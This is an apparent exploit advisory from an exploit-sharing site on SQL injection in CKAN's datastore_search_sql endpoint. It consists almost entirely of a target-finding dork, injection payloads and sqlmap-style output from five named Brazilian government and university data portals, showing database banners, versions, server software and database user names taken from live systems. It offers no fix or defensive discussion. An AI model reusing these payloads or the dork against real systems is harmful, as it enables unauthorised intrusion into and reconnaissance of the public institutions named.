CKAN Datastore Search - SQL-I (Brasil POC)

2021.10.28
id Gh05t666nero (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:/datastore_search_sql?sql=

[!] https://dados.pbh.gov.br/api/3/action/datastore_search_sql?sql={PAYLOAD} --- Parameter: sql (GET) Type: inline query Title: Generic inline queries Payload: sql=(SELECT CONCAT(CONCAT('qjbvq',(CASE WHEN (2680=2680) THEN '1' ELSE '0' END)),'qpqzq')) --- [04:56:39] [INFO] the back-end DBMS is PostgreSQL [04:56:39] [INFO] fetching banner [04:56:39] [INFO] resumed: 'PostgreSQL 12.7 (Debian 12.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by ... web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS operating system: Linux Debian back-end DBMS: PostgreSQL banner: 'PostgreSQL 12.7 (Debian 12.7-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit' [04:56:39] [INFO] fetching current user [04:56:42] [INFO] retrieved: 'datastore_default' current user: 'datastore_default' [04:56:42] [INFO] fetching current database [04:56:43] [INFO] retrieved: 'public' [!] http://dados.mda.gov.br/api/3/action/datastore_search_sql?sql={PAYLOAD} --- Parameter: sql (GET) Type: inline query Title: Generic inline queries Payload: sql=(SELECT CONCAT(CONCAT('qkxjq',(CASE WHEN (4590=4590) THEN '1' ELSE '0' END)),'qzkzq')) --- [04:57:09] [INFO] the back-end DBMS is PostgreSQL [04:57:09] [INFO] fetching banner [04:57:09] [INFO] resumed: 'PostgreSQL 9.4.13 on x86_64-suse-linux-gnu, compiled by gcc (SUSE Linux) 4.8.... web server operating system: Linux Ubuntu web application technology: Nginx 1.4.6 back-end DBMS operating system: Linux SuSE back-end DBMS: PostgreSQL banner: 'PostgreSQL 9.4.13 on x86_64-suse-linux-gnu, compiled by gcc (SUSE Linux) 4.8.5, 64-bit' [04:57:09] [INFO] fetching current user [04:57:09] [INFO] retrieved: 'usr_ckan_datastore_r' current user: 'usr_ckan_datastore_r' [04:57:09] [INFO] fetching current database [04:57:10] [INFO] retrieved: 'public' [!] http://dados.esag.udesc.br/api/action/datastore_search_sql?sql={PAYLOAD} --- Parameter: sql (GET) Type: inline query Title: Generic inline queries Payload: sql=(SELECT CONCAT(CONCAT('qvkvq',(CASE WHEN (6630=6630) THEN '1' ELSE '0' END)),'qjxjq')) --- [04:57:17] [INFO] the back-end DBMS is PostgreSQL [04:57:17] [INFO] fetching banner [04:57:17] [INFO] resumed: 'PostgreSQL 9.3.23 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-... web server operating system: Linux Ubuntu web application technology: Nginx 1.4.6 back-end DBMS operating system: Linux Ubuntu back-end DBMS: PostgreSQL banner: 'PostgreSQL 9.3.23 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-2ubuntu1~14.04.4) 4.8.4, 64-bit' [04:57:17] [INFO] fetching current user [04:57:18] [INFO] retrieved: 'datastore_default' current user: 'datastore_default' [04:57:18] [INFO] fetching current database [04:57:18] [INFO] retrieved: 'public' [!] http://dados.ufop.br/api/action/datastore_search_sql?sql={PAYLOAD} --- Parameter: sql (GET) Type: inline query Title: Generic inline queries Payload: sql=(SELECT CONCAT(CONCAT('qqppq',(CASE WHEN (7157=7157) THEN '1' ELSE '0' END)),'qvqqq')) --- [04:57:26] [INFO] the back-end DBMS is PostgreSQL [04:57:26] [INFO] fetching banner [04:57:27] [INFO] resumed: 'PostgreSQL 9.3.24 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-... web server operating system: Linux Ubuntu web application technology: Nginx 1.4.6 back-end DBMS operating system: Linux Ubuntu back-end DBMS: PostgreSQL banner: 'PostgreSQL 9.3.24 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-2ubuntu1~14.04.4) 4.8.4, 64-bit' [04:57:27] [INFO] fetching current user [04:57:27] [INFO] retrieved: 'datastore_default' current user: 'datastore_default' [04:57:27] [INFO] fetching current database [04:57:27] [INFO] retrieved: 'public' [!] https://dados.ibict.br/api/action/datastore_search_sql?sql={PAYLOAD} --- Parameter: sql (GET) Type: inline query Title: Generic inline queries Payload: sql=(SELECT CONCAT(CONCAT('qbpkq',(CASE WHEN (3017=3017) THEN '1' ELSE '0' END)),'qqzxq')) --- [04:57:34] [INFO] the back-end DBMS is PostgreSQL [04:57:34] [INFO] fetching banner [04:57:34] [INFO] resumed: 'PostgreSQL 9.4.10 on x86_64-unknown-linux-gnu, compiled by gcc (Debian 4.9.2-... web server operating system: Linux Ubuntu web application technology: Apache 2.4.7 back-end DBMS operating system: Linux Debian back-end DBMS: PostgreSQL banner: 'PostgreSQL 9.4.10 on x86_64-unknown-linux-gnu, compiled by gcc (Debian 4.9.2-10) 4.9.2, 64-bit' [04:57:34] [INFO] fetching current user [04:57:35] [INFO] retrieved: 'datastore_default' current user: 'datastore_default' [04:57:35] [INFO] fetching current database [04:57:37] [INFO] retrieved: 'public'


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top